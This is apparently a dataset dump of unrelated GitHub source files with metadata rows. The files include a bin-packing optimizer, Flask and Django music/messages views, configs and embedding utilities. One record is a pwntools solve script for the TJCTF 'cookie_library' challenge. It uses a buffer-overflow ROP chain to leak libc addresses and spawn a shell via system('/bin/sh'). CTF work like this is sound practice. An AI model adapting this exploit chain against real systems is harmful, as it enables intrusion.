summ += lis[item]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * lis[item2]['y'] * lis[item2]['z']
if (cis[item2][0] <= lis[item]['x']+cis[item][0] <= lis[item2]['x']+cis[item2][0] and cis[item][0]<cis[item2][0]):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * lis[item2]['y'] * lis[item2]['z']
if (lis[item2]['x']+cis[item2][0] <= lis[item]['x']+cis[item][0] and cis[item2][0]<=cis[item][0]<=cis[item2][0]+lis[item2]['x']):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item2]['y'] * lis[item2]['z']
if (lis[item2]['x']+cis[item2][0] <= lis[item]['x']+cis[item][0] and cis[item][0]<cis[item2][0]):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * lis[item2]['y'] * lis[item2]['z']
return summ
def main(cis, lis):
BEST = evaluate(cis, lis)
best = BEST
CIS = []
t = 100000
for r in range(250000):
#print(f"best={BEST}")
if (BEST == 0):
print("bin feasible")
break
newcis = neighbour(cis, lis)
newbest = evaluate(newcis, lis)
#print(f"newbest={newbest}")
if (newbest <= best):
if (newbest <= BEST):
BEST = newbest
CIS = newcis
best = newbest
cis = newcis
t *=.99995
continue
else:
diff = -best + newbest
metro = exp(-diff/t)
#print(metro)
if np.random.rand() < metro:
best = newbest
cis = newcis
t *=.99995
continue
return CIS
model = KMeans()
visualizer = KElbowVisualizer(model, k=(1,NUM_ITEMS-1))
visualizer.fit(np.array(lis2))
kmeans = KMeans(n_clusters=visualizer.elbow_value_, random_state=0).fit(lis2)
bags = []
for g in range(visualizer.elbow_value_):
bag = []
for gg in range(len(kmeans.labels_)):
if kmeans.labels_[gg] == g:
bag.append(lis2[gg])
bags.append(bag)
cis_bags = []
counter = 0
for bag in bags:
counter += 1
print(counter)
ncis = [[0,0,0] for i in range(len(bag))]
ba = {r :{'x': bag[r][0], 'y':bag[r][1], 'z':bag[r][2]} for r in range(len(bag))}
ncis = main(ncis, ba)
cis_bags.append(ncis) | [
"[email protected]"
] | |
33fbb50db9e6331092d5842b505407c2c4836161 | 683c3c5f256f115f5c3547b9482cbd5ef2b63d23 | /2020/TJCTF/6_cookie_library_solve.py | 61af9d19cfbf76d08159350ceec1ff30b9230e39 | [] | no_license | yueJDy/pwn | eb1e7292c4fb6d34f65e976742abb390730e8a1d | 32d0e748dd6d2c2327e5175fc34a1784b67b83a5 | refs/heads/master | 2021-08-11T04:09:42.688560 | 2021-04-16T09:00:40 | 2021-04-16T09:00:40 | 248,710,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 898 | py | from pwn import *
r = process('./cookie_library')
raw_input('debug')
rop_rdi = 0x400933
puts_got = 0x600fb8
printf_got = 0x600fc8
puts_plt = 0x400640
printf_offset = 0x055810
system_offset = 0x0453a0
binsh_offset = 0x18ce17
main = 0x400797
def func(rdi):
buf = 'a'*0x58
buf += p64(rop_rdi) + p64(rdi) + p64(puts_plt) + p64(main)
r.sendlineafter('Which is the most tasty?', buf)
r.recvuntil('be friends anymore\n')
res = r.recv(6) + '\x00'*2
leak = u64(res)
return leak
puts_add = func(puts_got)
log.info('puts_add = %#x' %puts_add)
printf_add = func(printf_got)
log.info('printf_add = %#x' %printf_add)
libc_base = printf_add - printf_offset
system_add = system_offset + libc_base
binsh_add = binsh_offset + libc_base
buf = 'a'*0x58
buf += p64(rop_rdi) + p64(binsh_add) + p64(system_add) + p64(main)
r.sendlineafter('Which is the most tasty?', buf)
r.interactive()
r.close()
# FLAG | [
"[email protected]"
] | |
56086c6802414a299cbe663e8adbf2869d183fca | a372318f7debad1fd5cd0f9937b6532f17101d7e | /config.py | a1799aaffa1fad127010c4fd4b739ac11814e2c0 | [] | no_license | xingjiliang/remote_hub | 51c8f5c44a6e577eb1dfa1b652dc9c1fae99e9c6 | e5ec040c80ac559cfeee112e1e21c1c5685ec6c5 | refs/heads/master | 2020-04-11T15:12:05.759842 | 2018-12-18T09:44:39 | 2018-12-18T09:44:39 | 160,143,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,630 | py | import sys
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_bool('remains', True, 'predict remains of one day or full day')
tf.app.flags.DEFINE_string('model_name', 'rnnV3', 'model name')
tf.app.flags.DEFINE_integer('city_id', 1, 'city id')
tf.app.flags.DEFINE_string('train_start_date', '2018-03-19', 'train start date')
tf.app.flags.DEFINE_string('train_end_date', '2018-08-16', 'train end date')
tf.app.flags.DEFINE_bool('load_previous_model', False, 'load_previous_model')
tf.app.flags.DEFINE_integer('previous_model_epoch_times', None, 'previous_model_epoch_times')
tf.app.flags.DEFINE_float('learning_rate', 1.0, 'learning rate')
tf.app.flags.DEFINE_float('keep_prob', 0.5, 'keep prob')
tf.app.flags.DEFINE_float('l2_lambda', 1e-5, 'l2 lambda')
tf.app.flags.DEFINE_integer('batch_size', 64, 'batch size')
tf.app.flags.DEFINE_integer('num_epochs', 1000, 'epoch times')
tf.app.flags.DEFINE_bool('evaluate_when_training', True, 'evaluate when training')
tf.app.flags.DEFINE_integer('test_data_batch_size', 64, 'batch size')
tf.app.flags.DEFINE_string('test_start_date', '2018-08-16', 'test start date')
tf.app.flags.DEFINE_string('test_end_date', '2018-09-21', 'test end date')
origin_dataset_dir = "origin_dataset"
dataset_dir = "dataset"
model_graph_dir = "model_graphs"
model_params_dir = "models"
result_dir = "results"
dateset_start_date = '2017-03-03'
holidays = [
'2017-04-02',
'2017-04-03',
'2017-04-04',
'2017-04-29',
'2017-04-30',
'2017-05-01',
'2017-05-28',
'2017-05-29',
'2017-05-30',
'2017-10-01',
'2017-10-02',
'2017-10-03',
'2017-10-04',
'2017-10-05',
'2017-10-06',
'2017-10-07',
'2017-10-08',
'2017-12-30',
'2017-12-31',
'2018-01-01',
'2018-02-15',
'2018-02-16',
'2018-02-17',
'2018-02-18',
'2018-02-19',
'2018-02-20',
'2018-02-21',
'2018-04-05',
'2018-04-06',
'2018-04-07',
'2018-04-29',
'2018-04-30',
'2018-05-01',
'2018-06-16',
'2018-06-17',
'2018-06-18',
'2018-09-22',
'2018-09-23',
'2018-09-24',
'2018-10-01',
'2018-10-02',
'2018-10-03',
'2018-10-04',
'2018-10-05',
'2018-10-06',
'2018-10-07']
end_of_holidays = [
'2017-04-04',
'2017-05-01',
'2017-05-30',
'2017-10-08',
'2018-01-01',
'2018-02-21',
'2018-04-07',
'2018-05-01',
'2018-06-18',
'2018-09-24',
'2018-10-07']
weekend_weekdays = [
'2017-04-01',
'2017-05-27',
'2017-09-30',
'2018-02-11',
'2018-02-24',
'2018-04-08',
'2018-04-28',
'2018-09-29',
'2018-09-30']
| [
"[email protected]"
] | |
4bdafadc03bd119cf1cf2ca6333044faa8767d51 | 5766681f62dacc8bb75707c38aef6498b222c63f | /betl/io/DatastoreClass_file.py | 0e03b70a9c2de030f402a0d392d1fb2756d563e5 | [] | no_license | brianspurling/betl | dd3f1eafd9ea606cbf078c46ae6d6c4954b4d1d1 | 536370382ec1dadaa0d6b42a22f169c3cbb4bea3 | refs/heads/master | 2022-12-10T09:41:39.478068 | 2019-06-28T09:11:07 | 2019-06-28T09:11:07 | 113,907,286 | 1 | 1 | null | 2022-12-08T01:01:41 | 2017-12-11T20:52:19 | Python | UTF-8 | Python | false | false | 513 | py | from .DatastoreClass import Datastore
class FileDatastore(Datastore):
def __init__(self, fileSysID, path, fileExt, delim, quotechar,
isSrcSys=False):
Datastore.__init__(self,
datastoreID=fileSysID,
datastoreType='FILESYSTEM',
isSrcSys=isSrcSys)
self.fileSysID = fileSysID
self.path = path
self.fileExt = fileExt
self.delim = delim
self.quotechar = quotechar
| [
"[email protected]"
] | |
3778801484833ddfb83ae9399c6ce822361bd792 | 9adbf55a256a550f2278c427285784d771c93519 | /Code/LSTM/africell_calls/models/net_utils.py | d3e024c1a5ecb28e0d2f03e09bbd137b5c6c12a5 | [
"Unlicense"
] | permissive | ssensalo/Sentitel | 17b8194c852b58eb28622fea052c32cc07f6d362 | 9e29d815964618f92eeb00b7cd76f1207d17d600 | refs/heads/master | 2023-04-08T13:38:26.008491 | 2021-04-28T19:47:26 | 2021-04-28T19:47:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | from gensim.models.keyedvectors import KeyedVectors
from gensim.test.utils import get_tmpfile
from gensim.scripts.glove2word2vec import glove2word2vec
import numpy as np
def get_init_embedding(reversed_dict, embedding_size):
print("Loading Glove vectors...")
glove_file = "glove/glove.6B.%dd.txt" % embedding_size
word2vec_file = get_tmpfile("word2vec_format.vec")
glove2word2vec(glove_file, word2vec_file)
word_vectors = KeyedVectors.load_word2vec_format(word2vec_file)
word_vec_list = list()
for _, word in sorted(reversed_dict.items()):
try:
word_vec = word_vectors.word_vec(word)
except KeyError:
word_vec = np.zeros([embedding_size], dtype=np.float32)
word_vec_list.append(word_vec)
return np.array(word_vec_list)
| [
"[email protected]"
] | |
f59c709b4851d78914ab1e518de74e0898a6492d | 4e5b7350cea01dc2bfdf4ea24d5c45d5f4540ea9 | /app/messages/views.py | 5ff5e7bed97ad2c2eb777b62d12df498516dcb8f | [] | no_license | netoho/fastmonkeys | efeaed32941597d86f69a8db502c34176f1d0292 | e9934a6ff72bcb82c4ed306d6f800d75cb1832ea | refs/heads/master | 2020-06-03T06:37:44.868895 | 2013-09-03T19:47:47 | 2013-09-03T19:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | from app import login_manager
from app import (app, db)
from app.posts.models import Post
from app.messages.models import Message
from app.messages.forms import MessageForm
from flask.ext.login import login_required
from flask import (Blueprint, session, redirect, url_for,
render_template, flash, request)
import math
__author__ = 'netoho'
mod = Blueprint('messages', __name__, url_prefix='/messages')
NUM_PAGES = 5
@mod.route('/new', methods=['GET', 'POST'])
@login_required
def new_message():
form = MessageForm()
if form.validate_on_submit():
message = Message(body=form.body.data)
db.session.add(message)
db.session.commit()
flash("Message created successfully")
return redirect(url_for('posts.list_posts'))
else:
return render_template('posts/form.html', form=form, url=url_for('messages.new_message')) | [
"[email protected]"
] | |
c330379402f016903fc3297df4987fb347a0e0d8 | e79198e622758cfbe737f4389e775e7a931e1343 | /isValidTime.py | c0590fa90600e45c6ae5dd85f3a453c086e5dd7e | [] | no_license | MichaelGhizzi/Python | e26d2d20607f6f18034344954e93c6ce9904da1f | 9b6586397b45a57df27514bc6c0271700fe5dc23 | refs/heads/master | 2021-01-10T16:22:52.005125 | 2016-08-28T23:01:11 | 2016-08-28T23:01:11 | 51,849,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,319 | py | #!/usr/bin/python3
#---------------------
# Name: Michael Ghizzi
# Lab Project #5
# CPSC 254 8:00pm T/TH
# isValidTime.py
# This program has the user enter in a specific time via arguments, and the program defines if the time is valid or not.
#---------------------
import sys
import re
def main():
# defines main function
if len(sys.argv) != 2: # if there are more than 2 arguments
# the time is invalid
print("ERROR: Invalid time. Usage: ./isValidTime.py '##:## am|AM|pm|PM'") # prints invalid
else:
# Regular expression used to make sure the time is between 1-12
# followed by a am/pm at the end of the two numbers.
# the result is then assigned the the first argument
#pattern = re.compile(r"(12|11|10|0?[1-9]):([0-5][0-9]) ?([aApP])[mM]")
pattern = re.compile(r"(12|11|10|0?[1-9]):([0-5][0-9])(\s)?(AM|am|pm|PM)")
result = pattern.match(sys.argv[1])
if result: # if result is valid, prints is time valid
print("is valid time")
else: # if result is not valid, prints invalid time
print("invalid time")
# Pythonese needed to run the program by itself, gives the
# program permission to use anything inside the program itself
# If we take this out, the program will not run properly.
# Allows the program to be called from outside
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
584d9a4af69835aa15cfa9e2ae912447c8fd5ded | 1f4f14b3315428457538167795775d047e139e57 | /music/views.py | a3b5eb5aa199f69a4e53bb38a73ccb041348c12e | [] | no_license | johnYANGGAO/python_web_with_django | b1ac080b53fd740e91850e4c7f45b6fa927f9620 | a9de0b6d2f60bacbc83492e0d66d73a3144f93d8 | refs/heads/master | 2021-01-11T19:58:46.007546 | 2017-01-20T09:21:40 | 2017-01-20T09:21:40 | 79,436,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,334 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/22/16 2:40 PM
# @Author : YangGao
# @File : views.py
# from django.http import Http404
from django.http import HttpResponse
from .models import Album, Song
from django.template import loader
from django.shortcuts import render, get_object_or_404
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.views import generic
from .forms import AlbumForm, UserForm, SongForm
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from django.db.models import Q
AUDIO_FILE_TYPES = ['wav', 'mp3', 'ogg']
IMAGE_FILE_TYPES = ['png', 'jpg', 'jpeg']
def index_render(request):
all_albums = Album.objects.all()
context = {
'all_albums': all_albums
}
return render(request, 'music/index.html', context)
def index_template(request):
all_albums = Album.objects.all()
template = loader.get_template('music/index.html')
context = {
'all_albums': all_albums,
}
return HttpResponse(template.render(context, request))
# def index(request):
# all_albums = Album.objects.all()
# html = ''
#
# for album in all_albums:
# url = '/music/' + str(album.id) + '/'
# html += '<a href="' + url + '">' + album.album_title + '</a><span>' + \
# '<a href="' + album.album_logo + '"> 专辑logo</a></span><br>'
#
# return HttpResponse(html)
def detail(request, album_id):
# try:
# album = Album.objects.get(pk=album_id)
# except Album.DoesNotExist:
# raise Http404('Album does not exist')
# '''No Album matches the given query.'''
album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/detail.html', {
'album': album})
def favorite(request, album_id):
album = get_object_or_404(Album, pk=album_id)
try:
selected_song = album.song_set.get(pk=request.POST['song'])
except (KeyError, Song.DoesNotExist):
return render(request, 'music/a.html', {
'album': album, 'error_message': 'no song be selected '})
else:
selected_song.is_favorite = True
selected_song.save()
return render(request, 'music/b.html', {'album': album})
def favorite_direct(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
selected_song = Song.objects.get(pk=song_id)
selected_song.is_favorite = True
selected_song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
def cancel_favorite(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
selected_song = Song.objects.get(pk=song_id)
selected_song.is_favorite = False
selected_song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
''' check all of favorite songs alone by album_id in browser'''
def favorite_display(request, album_id):
